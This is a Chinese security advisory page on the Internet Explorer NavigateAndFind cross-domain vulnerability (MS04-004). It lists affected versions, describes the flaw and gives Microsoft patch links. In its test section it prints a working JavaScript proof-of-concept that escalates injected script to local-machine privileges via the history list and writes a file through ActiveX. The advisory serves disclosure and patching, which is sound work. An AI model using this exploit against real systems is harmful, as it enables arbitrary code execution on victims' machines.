首页 -> 安全研究
安全研究
安全漏洞
Microsoft Internet Explorer NavigateAndFind()跨域策略漏洞(MS04-004)
发布日期:2004-02-03
更新日期:2004-02-11
受影响系统:
Microsoft Internet Explorer 6.0SP1描述:
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
BUGTRAQ ID: 9568
CVE(CAN) ID: CVE-2003-1026
Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer在部分环境下没有从浏览器历史列表中删除JAVASCRIPT,远程攻击者可以利用这个漏洞绕过域策略,以本地机器权限执行任意脚本。
Internet Explorer包含的跨域安全模型存在一个漏洞。Internet Explorer的跨域安全模型使不同域窗口共享信息。MSIE一般情况下会尝试删除历史列表中的Javascript URLS,但在部分条件下却可能失败。使用external.NavigateAndFind('res:','','')从一Javascript URL中链接一资源,这里'res:'重定向到本地电脑域,那么返回到Javascript URL就会以本地域权限采用并执行。
攻击者必须构建恶意链接,或恶意HTML形式EMAIL,诱使用户访问,来触发此漏洞。
<*来源:Andreas Sandblad (sandblad@acc.umu.se)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107584480026576&w=2
http://www.microsoft.com/technet/security/bulletin/MS04-004.asp
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
// Andreas Sandblad, 2004-02-03, patched by MS04-004
// Name: payload
// Purpose: Run payload code called from Local Machine zone.
// The code may be arbitrary such as executing shell commands.
// This demo simply creates a harmless textfile on the desktop.
function payload() {
file = "sandblad.txt";
o = new ActiveXObject("ADODB.Stream");
o.Open();
o.Type=2;
o.Charset="ascii";
o.WriteText("You are vulnerable!");
o.SaveToFile(file, 2);
o.Close();
alert("File "+file+" created on desktop!");
}
// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
if (history.length != len)
payload();
else
return "<title>-</title><body
onload=external.NavigateAndFind('res:','','')>";
}
// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
}
// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
backbutton();
建议:
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS04-004)以及相应补丁:
MS04-004:Cumulative Security Update for Internet Explorer (832894)
链接:http://www.microsoft.com/technet/security/bulletin/MS04-004.asp
补丁下载:
Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?FamilyId=70530968-B59A-47C0-90D3-0C884910BC97&displaylang=en
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
http://www.microsoft.com/downloads/details.aspx?FamilyId=326EFFDA-8D86-4683-BC77-9BF410BC620D&displaylang=en
Internet Explorer 6 for Windows Server 2003
http://www.microsoft.com/downloads/details.aspx?FamilyId=D78AE4F7-8852-4A04-B8F6-1DE327E598F0&displaylang=en
Internet Explorer 6 for Windows Server 2003 (64-Bit Edition)
http://www.microsoft.com/downloads/details.aspx?FamilyId=6A7894F0-789F-4152-9AE4-8DCB43404149&displaylang=en
Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?FamilyId=BE0C18BC-7F9A-4196-BFDE-29EBA8CF7A50&displaylang=en
Internet Explorer 5.5 Service Pack 2
http://www.microsoft.com/downloads/details.aspx?FamilyId=EFFE87F6-7ACA-4A54-B767-5597DDE95C6F&displaylang=en
Internet Explorer 5.01 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?FamilyId=F5E74139-6E0E-49FD-9AA2-36D2D8454A92&displaylang=en
Internet Explorer 5.01 Service Pack 3
http://www.microsoft.com/downloads/details.aspx?FamilyId=202D3AAC-6B56-4F4A-8C0F-4183C77B6B51&displaylang=en
Internet Explorer 5.01 Service Pack 2
http://www.microsoft.com/downloads/details.aspx?FamilyId=17904608-DCEE-4C99-A780-81D6DBC48DD5&displaylang=en
浏览次数:3900
严重程度:0(网友投票)
绿盟科技给您安全的保障